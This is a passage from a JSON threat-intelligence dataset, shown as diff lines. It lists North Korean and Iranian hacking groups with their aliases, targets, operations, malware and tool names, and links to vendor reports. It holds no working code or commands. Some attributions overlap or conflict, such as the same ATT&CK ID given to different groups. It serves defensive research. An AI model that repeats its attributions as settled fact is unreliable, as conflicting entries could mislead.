"http://www.mcafee.com/us/resources/white-papers/wp-dissecting-operation-troy.pdf", + "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity", + "https://www.us-cert.gov/ncas/alerts/TA17-318A", + "https://medium.com/s2wlab/analysis-of-threatneedle-c-c-communication-feat-google-tag-warning-to-researchers-782aa51cf74", + "https://www.sentinelone.com/blog/lazarus-apt-targets-mac-users-poisoned-word-document/", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.crowdstrike.com/blog/unprecedented-announcement-fbi-implicates-north-korea-destructive-attacks/", + "https://blogs.microsoft.com/on-the-issues/2017/12/19/microsoft-facebook-disrupt-zinc-malware-attack-protect-customers-internet-ongoing-cyberthreats/", + "https://www.welivesecurity.com/2020/06/17/operation-interception-aerospace-military-companies-cyberspies/", + "https://threatrecon.nshc.net/2019/01/23/sectora01-custom-proxy-utility-tool-analysis/", + "https://www.darkreading.com/vulnerabilities---threats/lazarus-group-fancy-bear-most-active-threat-groups-in-2017/d/d-id/1330954?print=yes", + "https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf", + "https://objective-see.com/blog/blog_0x49.html", + "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-a-job-offer-thats-too-good-to-be-true/", + "https://blog.alyac.co.kr/2827", + "https://securelist.com/lazarus-threatneedle/100803/", + "http://www.fsec.or.kr/common/proc/fsec/bbs/21/fileDownLoad/1235.do", + "https://www.clearskysec.com/operation-dream-job/", + "https://blogs.jpcert.or.jp/en/2020/08/Lazarus-malware.html", + "http://researchcenter.paloaltonetworks.com/2015/11/tdrop2-attacks-suggest-dark-seoul-attackers-return/", + 
"https://www.alienvault.com/open-threat-exchange/blog/operation-blockbuster-unveils-the-actors-behind-the-sony-attacks", + "https://www.secureworks.com/about/press/media-alert-secureworks-discovers-north-korean-cyber-threat-group-lazarus-spearphishing", + "https://www.hvs-consulting.de/lazarus-report/", + "https://www.us-cert.gov/ncas/alerts/TA17-318B", + "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/", + "https://blog.chainalysis.com/reports/lazarus-group-kucoin-exchange-hack", + "https://blog.alyac.co.kr/3814", + "https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/" + ], + "attck_id": null, + "comment": "Threat Recon.nshc.net alias=SectorA01" + }, + { + "country": "north_korea", + "names": [ + "APT37", + "Ricochet Chollima", + "Venus 121 (\u00ea\u00b8\u0088\u00ec\u0084\u00b1121)", + "Red Eyes", + "THALLIUM", + "Reaper" + ], + "targets": [ + "Primarily South Korea \u00e2\u0080\u0093 though also Japan, Vietnam and the Middle East \u00e2\u0080\u0093 in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare; Scarcruft Tracking: Russia, Nepal, South Korea, China, India, Kuwait and Romania" + ], + "operations": [ + "FreeMilk", + "Evil New Year", + "Erebus", + "Are you Happy?", + "Evil New Year 2018", + "Golden Time", + "North Korean Human Rights" + ], + "description": null, + "tools": [ + "MILKDROP", + "POORAIM", + "SLOWDRIFT", + "Flash Exploit CVE-2016-4117", + "CORALDECK", + "RUHAPPY", + "BabyShark", + "KEVDROID", + "SOUNDWAVE", + "ROKRAT", + "HAPPYWORK", + "GOLDBACKDOOR", + "GELCAPSULE", + "RICECURRY", + "KARAE", + "DOGCALL", + "SHUTTERSPEED", + "KimJongRAT", + "ZUMKONG" + ], + "links": [ + "https://exchange.xforce.ibmcloud.com/collection/Fear-The-Reaper-North-Korean-Group-APT37-dc96e8bdff7573efb87d43d7584c1fbc", + 
"https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/", + "https://unit42.paloaltonetworks.com/unit42-reaper-groups-updated-mobile-arsenal/", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/", + "https://www.zdnet.com/article/microsoft-takes-down-50-domains-operated-by-north-korean-hackers/?mid=1#cid=8960026", + "https://securelist.com/blog/research/75082/cve-2016-4171-adobe-flash-zero-day-used-in-targeted-attacks/", + "https://0xthreatintel.medium.com/static-analysis-of-bluelight-malware-7bb0a399a54e", + "https://unit42.paloaltonetworks.com/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/", + "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", + "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/?utm_source=rss&utm_medium=rss&utm_campaign=north-korean-apt-inkysquid-infects-victims-using-browser-exploits", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", + "https://blog.alyac.co.kr/3489", + "https://blog.alyac.co.kr/1985", + "https://blogs.microsoft.com/on-the-issues/2019/12/30/microsoft-court-action-against-nation-state-cybercrime/", + "https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html" + ], + "attck_id": null, + "comment": "FireEye iSIGHT Intelligence believes that 
APT37 is aligned with the activity publicly reported as Scarcruft and Group123" + }, + { + "country": "north_korea", + "names": [ + "Andariel", + "Silent Chollima" + ], + "targets": [ + "Information gathering and profit" + ], + "operations": [ + "XEDA", + "DesertWolf", + "Mayday", + "INITROY", + "Vanxatm", + "Sony" + ], + "description": null, + "tools": [ + "RifDoor", + "Phandoor" + ], + "links": [ + "http://online.wsj.com/public/resources/documents/print/WSJ_-A006-20170728.pdf", + "https://www.scmagazineuk.com/war-plans-including-assassination-plan-stolen-by-north-korean-hackers/article/699089/", + "http://www.fsec.or.kr/user/bbs/fsec/21/13/bbsDataView/910.do", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-andariel-reconnaissance-tactics-hint-at-next-targets/", + "https://gsec.hitb.org/materials/sg2017/D1%20-%20Ashley%20Shen%20and%20Moonbeom%20Park%20-%20A%20Deep%20Dive%20into%20the%20Digital%20Weapons%20of%20the%20North%20Korean%20Cyber%20Army.pdf" + ], + "attck_id": null, + "comment": "Lazarus subgroup" + }, + { + "country": "north_korea", + "names": [ + "TA406 (Proofpoint)", + "Velvet Chollima", + "Kimsuki", + "CloudDragon", + "Thallium", + "Kimsuky" + ], + "targets": [ + "This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes." 
+ ], + "operations": [], + "description": null, + "tools": [ + "KPortScan", + "Mimikatz", + "PsExec", + "Eternal suite of exploits", + "KGH_SPY", + "Mechanical", + "Procdump", + "Grease", + "NirSoft MailPassView/Network Password Recovery/Remote Desktop PassView/SniffPass/WebBrowserPassView" + ], + "links": [ + "https://www.zdnet.com/article/cyber-espionage-group-uses-chrome-extension-to-infect-victims/", + "https://apt.securelist.com/#!/threat/972", + "https://www.anomali.com/blog/suspected-north-korean-cyber-espionage-campaign-targets-multiple-foreign-ministries-and-think-tanks#When:14:00:00Z", + "https://blog.alyac.co.kr/3799", + "https://blog.alyac.co.kr/4130", + "http://www.reuters.com/article/us-nuclear-southkorea-northkorea-idUSKBN0MD0GR20150317", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://blog.alyac.co.kr/2243", + "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", + "https://cybleinc.com/2021/06/03/kimsuky-apt-group-distributes-fake-security-app-disguised-as-kisa-security-program/", + "https://www.dailynk.com/english/north-korean-hackers-mount-phishing-attack-nkhr-groups/", + "https://blog.prevailion.com/2019/09/autumn-aperture-report.html", + "https://blog.yoroi.company/research/the-north-korean-kimsuky-apt-keeps-threatening-south-korea-evolving-its-ttps/", + "http://securelist.com/analysis/57915/the-kimsuky-operation-a-north-korean-apt/", + "https://asec.ahnlab.com/1313?category=342979", + "https://teamt5.org/en/posts/clouddragon-campaign-vpn-zero-day-vulnerability-new-backdoor/", + "https://blog.alyac.co.kr/2906", + "https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-threat-insight-paper-triple-threat-N-Korea-aligned-TA406-steals-scams-spies.pdf", + "https://crowdstrike.lookbookhq.com/web-global-threat-report-2019/crowdstrike-2019-gtr", + "https://blog.alyac.co.kr/3368", + 
"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-009.pdf", + "https://blog.alyac.co.kr/attachment/cfile5.uf@99A0CD415CB67E210DCEB3.pdf", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", + "http://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "north_korea", + "names": [ + "NoName" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "malware with name \"mySingleMessenger.exe\"" + ], + "links": [ + "http://securityfactory.tistory.com/332" + ], + "attck_id": null, + "comment": "NorthKorea vs Samsung" + }, + { + "country": "north_korea", + "names": [ + "OnionDog" + ], + "targets": [ + "This threat actor targets the South Korean government, transportation, and energy sectors." + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml", + "http://www.chinadaily.com.cn/china/2016-03/09/content_23794129.htm", + "http://zhuiri.360.cn/upload/APT-C-03-en.pdf" + ], + "attck_id": null, + "comment": "False Positive. 
APT Training by SK Government" + }, + { + "country": "north_korea", + "names": [ + "APT38", + "TEMP.Hermit" + ], + "targets": [ + "Korean Peninsula, US Aerospace, SWIFT-fraud operations in East Asia" + ], + "operations": [], + "description": "Media, government, but mainly financial institutions in order to raise money for the North Korean regime: Russia, Turkey, US, Poland, Mexico, Brazil, Ururguay, Taiwan, Malaysia, Chile, Vietnam, Philippines", + "tools": [ + "VOLGMER", + "PEACHPIT" + ], + "links": [ + "https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-of-february-17th/", + "http://www.scmagazine.com/sony-hackers-are-still-hacking-researchers-say/article/474166/", + "https://www.fireeye.com/blog/threat-research/2018/10/apt38-details-on-new-north-korean-regime-backed-threat-group.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "north_korea", + "names": [ + "?" + ], + "targets": [ + "Humanitarian Aid Groups" + ], + "operations": [], + "description": null, + "tools": [ + "MaoCheng Dropper" + ], + "links": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "north_korea", + "names": [ + "ElectricFish", + "APT38", + "Stardust Chollima", + "BlueNoroff" + ], + "targets": [ + "Latin America, Mexico, Costa Rica, Chile, Argentina, financial institutions in Asia and Africa in 2018" + ], + "operations": [ + "Far Eastern International Bank" + ], + "description": null, + "tools": [ + "MBR Killer", + "ElectricFish", + "Dimens" + ], + "links": [ + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a", + 
"https://www.thedailybeast.com/north-korean-hackers-caught-snooping-on-chinas-cyber-squad", + "https://techcrunch.com/2019/08/15/cyber-command-north-korea-malware/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/", + "https://app.cdn.lookbookhq.com/lbhq-production/10339/content/original/9dd0e31a-c9c0-4e1c-aea1-f35d3e930f3d/CrowdStrike_GTR_2019_.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "COBALT GYPSY", + "TG-2889", + "Ghambar", + "Cutting Kitten" + ], + "targets": [ + "This threat actor targets governments and private sector entities for espionage and sabotage purposes. It is believed to be responsible for compromising U.S. Navy computers at the Navy Marine Corps Intranet in San Diego, the U.S. energy company Calpine Corporation, Saudi Aramco, Pemex, Qatar Airways, and Korean Air" + ], + "operations": [ + "Cleaver" + ], + "description": null, + "tools": [ + "TinyZBot", + "PupyRAT" + ], + "links": [ + "https://cdn2.hubspot.net/hubfs/270968/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf", + "https://www.secureworks.com/research/the-curious-case-of-mia-ash", + "http://www.secureworks.com/cyber-threat-intelligence/threats/suspected-iran-based-hacker-group-creates-network-of-fake-linkedin-profiles/" + ], + "attck_id": "G0059", + "comment": "COBALT GYPSY overlap with OilRig" + }, + { + "country": "iran", + "names": [ + "Volatile Kitten", + "Shamoon" + ], + "targets": [ + "This threat actor targets energy sector, oil and gas industry as well as transportation and telecommunication services." 
+ ], + "operations": [], + "description": "wiper", + "tools": [ + "Shamoon / Disttrack" + ], + "links": [ + "https://en.wikipedia.org/wiki/Shamoon", + "http://www.nytimes.com/2012/10/24/business/global/cyberattack-on-saudi-oil-firm-disquiets-us.html" + ], + "attck_id": "S0140", + "comment": null + }, + { + "country": "iran", + "names": [ + "Group 41", + "Clever Kitten" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "PHP Webshell RC SHELL", + "Acunetix Web Vulnerability Scanner" + ], + "links": [ + "http://www.crowdstrike.com/blog/whois-clever-kitten/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Madi" + ], + "targets": [ + "This threat actor compromises engineering firms, government entities, and financial and academic institutions in the United States, Israel, Iran, and Pakistan" + ], + "operations": [], + "description": "Social engineering", + "tools": [], + "links": [ + "https://securelist.com/blog/incidents/33693/the-madi-campaign-part-i-5/", + "https://securelist.com/blog/incidents/33701/the-madi-campaign-part-ii-53/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Cyber fighters of Izz Ad-Din Al Qassam", + "Fraternal Jackal" + ], + "targets": [ + "The websites of Bank of America, JPMorgan Chase, Wells Fargo, and other U.S. financial institutions suffered simultaneous outages due to a coordinated denial of service cyberattack in September 2012. Attackers flooded bank servers with junk traffic, preventing users from online banking. An Iranian group called Izz ad-Din al-Qassam Cyber Fighters initially claimed responsibility for the incident. At the time, the media reported that U.S. intelligence believed the denial of service was in response to U.S. imposed economic sanctions to counter Iran's nuclear program. Seven Iranian individuals linked to the Islamic Revolutionary Guard Corps were eventually indicted by the U.S. 
Department of Justice in 2016 for their involvement in the incident." + ], + "operations": [ + "Ababil / ApAbabil" + ], + "description": "DoS", + "tools": [], + "links": [ + "http://ddanchev.blogspot.com.es/2012/09/dissecting-operation-ababil-osint.html", + "http://www.nytimes.com/2013/01/09/technology/online-banking-attacks-were-work-of-iran-us-officials-say.html", + "https://www.washingtonpost.com/world/national-security/iran-blamed-for-cyberattacks/2012/09/21/afbe2be4-0412-11e2-9b24-ff730c7f6312_story.html", + "http://pastebin.com/u/QassamCyberFighters" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Chafer", + "ITG07", + "Cadelle", + "Remix Kitten", + "APT39", + "Rana" + ], + "targets": [ + "Airlines, Airports, Transportation, Logistics - worldwide" + ], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "Remcom", + "PsExec", + "Web Shells (aspx spy", + "nbtscan", + "HTTPTunnel", + "Cadelspy", + "VNC Bypass scanner", + "PLink", + "plink", + "b374k)", + "SSH Tunnels to Windows Servers", + "Remexi", + "NSSM", + "Impacket / Python exploits", + "CoreSecurity tools", + "RemCom" + ], + "links": [ + "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", + "https://threatconnect.com/blog/research-roundup-apt39-adversaries/", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "http://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets", + "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/", + "https://securityintelligence.com/posts/observations-of-itg07-cyber-operations/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/", + "https://securelist.com/chafer-used-remexi-malware/89538/", + 
"https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-releases-cybersecurity-advisory-on-previously-undisclosed-iranian-malware-used-to-monitor-dissidents-and-travel-and-telecommunications-companies", + "https://www.bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf" + ], + "attck_id": "G0087", + "comment": "Uses the same C2 infrastructure as OilRig" + }, + { + "country": "iran", + "names": [ + "Prince of Persia", + "APT-C-50" + ], + "targets": [ + "This threat actor targets governments and businesses of multiple countries, including the United States, Israel, and Denmark." + ], + "operations": [], + "description": null, + "tools": [ + "Infy" + ], + "links": [ + "https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/", + "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://blogs.360.cn/post/APT-C-50.html", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", + "https://iranthreats.github.io/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Sima" + ], + "targets": [ + "focus on dissidents, woman rights activists, human rights organizations " + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://iranthreats.github.io/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "iran", + "names": [ + "Chrysene", + "APT34", + "Helix Kitten", + "ITG13", + "COBALT GYPSY", + "Oilrig", + "Twisted Kitten", + "Crambus" + ], + "targets": [], + "operations": [], + "description": null, + 
"tools": [ + "OopsIE", + "ALMA Communicator", + "BONDUPDATER", + "ELVENDOOR", + "LittleFace)", + "Invoke-Obfuscation", + "PowDesk", + "QUADAGENT", + "Helminth", + "POWBAT", + "ISMDoor", + "SSH Tunnels to Windows Servers", + "Clayslide", + "POWRUNER (PS Backdoor)", + "malicious RTF files CVE-2017-0199 and CVE-2017-11882", + "PsExec", + "PLink", + "Webshells (TwoFace", + "customized Mimikatz", + "DarkSeaGreenShell" + ], + "links": [ + "https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a", + "https://www.dragos.com/blog/20180517Chrysene.html", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/", + "https://securityintelligence.com/posts/new-destructive-wiper-zerocleare-targets-energy-sector-in-the-middle-east/", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-twoface-webshell-persistent-access-point-lateral-movement/", + "https://blog-cert.opmd.fr/dnspionage-retour-factuel-sur-les-attaques-annoncees-dans-differents-medias/", + "https://www.clearskysec.com/powdesk-apt34/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/", + "https://researchcenter.paloaltonetworks.com/2017/12/unit42-introducing-the-adversary-playbook-first-up-oilrig/", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + 
"https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", + "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html", + "https://cert.gov.il/Updates/Alerts/SiteAssets/CERT-IL-ALERT-W-120.pdf", + "http://www.clearskysec.com/oilrig/", + "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/", + "http://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability%20", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" + ], + "attck_id": "G0049", + "comment": "Uses the same C2 infrastructure as Chafer - which caused a major mixup of OilRig campaigns falsely attributed to Chafer. Also note that Turla used OilRigs implants" + }, + { + "country": "iran", + "names": [ + "CopyKittens", + "DarkHydrus", + "Slayer Kitten", + "LazyMeerkat" + ], + "targets": [ + "Israel\u00e2\u0080\u0099s Ministry of Foreign Affairs and some well-known Israeli academic researchers specializing in Middle East Studies. 
Israel, Saudi Arabia, United States, Jordan, Germany" + ], + "operations": [ + "Wilted Tulip" + ], + "description": null, + "tools": [ + "TDTESS backdoor", + "Matryoshka v1 and Matryoshka v2", + "Cobalt Strike", + "ZPP", + "NetSrv", + "Vminst" + ], + "links": [ + "http://www.clearskysec.com/tulip/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", + "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf", + "http://www.clearskysec.com/copykitten-jpost/", + "https://blog.domaintools.com/2017/03/hunt-case-study-hunting-campaign-indicators-on-privacy-protected-attack-infrastructure/" + ], + "attck_id": "G0052", + "comment": "DarkHydrus C2 Infra Overlap" + }, + { + "country": "iran", + "names": [ + "APT35", + "NewsBeef", + "NEWSCASTER", + "Charming Kitten", + "Phosphorus", + "Parastoo", + "Group 83", + "iKittens" + ], + "targets": [ + "This threat actor uses watering hole attacks and fake profiles to lure targets from the U.S. government for espionage purposes." 
+ ], + "operations": [], + "description": "Fake Social Media Account ", + "tools": [ + "ALFA TEaM Shell", + "DROPSHOT", + "MacDownloader", + "SHAPESHIFT", + "malicious HTA files", + "TURNEDUP" + ], + "links": [ + "https://www.verfassungsschutz.de/download/broschuere-2016-10-bfv-cyber-brief-2016-04.pdf", + "https://securelist.com/twas-the-night-before/91599/", + "https://www.forbes.com/sites/thomasbrewster/2017/07/27/iran-hackers-oilrig-use-fake-personas-on-facebook-linkedin-for-cyberespionage/", + "https://www.clearskysec.com/the-kittens-are-back-in-town-3/", + "http://www.clearskysec.com/charmingkitten/", + "https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf", + "https://iranthreats.github.io/resources/macdownloader-macos-malware/", + "https://www.isightpartners.com/2014/05/newscaster-iranian-threat-inside-social-media/", + "https://www.clearskysec.com/the-kittens-are-back-in-town-2/", + "https://github.com/gasgas4/APT_CyberCriminal_Campagin/tree/master/2014/2014.05.28.NewsCaster_An_Iranian_Threat_Within_Social_Networks", + "https://blogs.microsoft.com/on-the-issues/2019/10/04/recent-cyberattacks-require-us-all-to-be-vigilant/", + "https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://noticeofpleadings.com/phosphorus/files/Sealing.pdf?fbclid=IwAR1HMnynb0AaGyCI-8ejHjH-pNORfuHYOzQdsTrSpin2eRww6rRh-6VK2SI", + "https://www.secureworks.com/blog/cobalt-mirage-conducts-ransomware-operations-in-us", + "https://www.cybereason.com/blog/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage", + "https://cryptome.org/2012/11/parastoo-hacks-iaea.htm", + "https://www.clearskysec.com/wp-content/uploads/2019/09/The-Kittens-Are-Back-in-Town-Charming-Kitten-2019.pdf", + "https://securelist.com/blog/software/74503/freezer-paper-around-free-meat/" + ], + "attck_id": "G0059", + "comment": "IBM=ITG18" + }, + { + 
"country": "iran", + "names": [ + "Greenbug " + ], + "targets": [ + "Saudi Arabia" + ], + "operations": [], + "description": null, + "tools": [ + "ISMdoor" + ], + "links": [ + "https://www.arbornetworks.com/blog/asert/greenbugs-dns-isms/", + "http://www.clearskysec.com/ismagent/", + "https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2017/february/ism-rat/", + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/" + ], + "attck_id": null, + "comment": "Sub group of APT34 according to Mandiant" + }, + { + "country": "iran", + "names": [ + "Refined Kitten", + "APT33", + "Holmium", + "Magic Hound", + "Elfin", + "MAGNALLIUM", + "Timberworm" + ], + "targets": [ + "A threat actor used malware known as Shamoon 2.0 to exfiltrate and delete data from computers in the Saudi transportation sector. Commercial entities, Middle East, US, South Korea, DND focussed entities, Airlines, Airline suppliers. 
" + ], + "operations": [ + "Stonedrill/ Shamoon2.0" + ], + "description": null, + "tools": [ + "LaZagne", + "Shamoon", + "Remcos", + "DarkComet", + "AutoIt FTP tool", + "Ruler", + "PowerShell downloader (registry.ps1)", + "POSHC2 backdoor", + "POSHC2 (.NET backdoor)", + "Quasar RAT", + "AutoIt backdoor", + "POWERTON", + "SniffPass", + "different keyloggers", + "Gpppassword", + "PUPYRAT", + ".NET FTP tool", + "TURNEDUP" + ], + "links": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/", + "https://www.securityweek.com/iranian-hackers-caused-losses-hundreds-millions-report", + "https://go.recordedfuture.com/hubfs/reports/cta-2019-0626.pdf", + "https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/", + "https://gallery.logrhythm.com/threat-intelligence-reports/shamoon-2-malware-analysis-logrhythm-labs-threat-intelligence-report.pdf", + "https://www.wired.com/story/iran-apt33-industrial-control-systems/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/more-than-a-dozen-obfuscated-apt33-botnets-used-for-extreme-narrow-targeting/", + "https://webcache.googleusercontent.com/search?q=cache:Dicnr9-eKKYJ:https://securelist.com/files/2017/03/Report_Shamoon_StoneDrill_final.pdf+&cd=6&hl=en&ct=clnk&gl=ie", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.symantec.com/connect/blogs/shamoon-multi-staged-destructive-attacks-limited-specific-targets" + ], + "attck_id": "G0059", + "comment": "possibly associated with Rocket Kitten and Cobalt Gypsy, Sandcat, use Recruitment themes" + }, + { + "country": "iran", + "names": [ + 
"TEMP.Beanie", + "Saffron Rose", + "Flying Kitten", + "Rocket Kitten", + "Ajax Security Team", + "Group 26" + ], + "targets": [ + "Saudi Arabia, Israel, US, Iran, high ranking defense officials, embassies of various target countries, notable Iran researchers, human rights activists, media and journalists, academic institutions and various scholars, including scientists in the fields of physics and nuclear sciences. It seeks out material related to diplomacy, defense, security, journalism, and human rights for espionage purposes." + ], + "operations": [ + "Woolen Goldfish", + "Thamar Reservoir" + ], + "description": null, + "tools": [ + "MPK", + "MagicHound.Leash (IRC Bot)", + "GHOLE / Core Impact", + "Open source tools", + "Puppy RAT", + "CWoolger", + "FireMalv", + "PowGoop (Downloader.Covic)", + ".NETWoolger" + ], + "links": [ + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2014/july/a-new-flying-kitten/", + "https://citizenlab.org/2015/08/iran_two_factor_phishing/", + "http://www.clearskysec.com/thamar-reservoir/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-operation-saffron-rose.pdf", + "https://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-the-spy-kittens-are-back.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-woolen-goldfish-when-kittens-go-phishing", + "http://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/" + ], + "attck_id": "G0059", + "comment": null + }, + { + "country": "iran", + "names": [ + "?" + ], + "targets": [ + "This threat actor is based in the Middle East (possibly Iran) and targets English- and Persian-language organizations. It is alleged to be the same group behind a compromise of the Danish Ministry of Foreign Affairs." 
